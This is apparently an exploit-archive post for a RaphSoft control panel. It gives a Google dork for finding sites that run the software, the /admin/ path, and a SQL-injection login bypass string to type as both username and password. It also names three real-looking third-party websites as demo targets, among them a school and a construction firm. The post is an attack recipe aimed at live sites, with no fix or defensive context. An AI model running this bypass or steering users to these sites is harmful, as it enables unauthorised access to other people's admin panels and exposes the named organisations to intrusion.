# Exploit Title : RaphSoft Control Panel Bypass Admin Page Vulnerability
# Date : 2018-10-05
# Exploit Author : Iran Cyber Security Group
# Google Dork : "intext:Designed by RaphSoft"
# category : webapps
# Tested on : Win7 , Kali Linux
Proof of Concept :
search google Dork : "intext:Designed by RaphSoft"
Demo :
Then Choose a Target and put this after URL : /admin/
And fill username and password like the information below :
Username : '=' 'or'
Password : '=' 'or'
http://www.johnsonmarkconstructs.com/admin/
http://www.tombeyschool.com/admin/
http://www.royalstridesecuritysystems.com/admin/
# Discovered by : Mr_null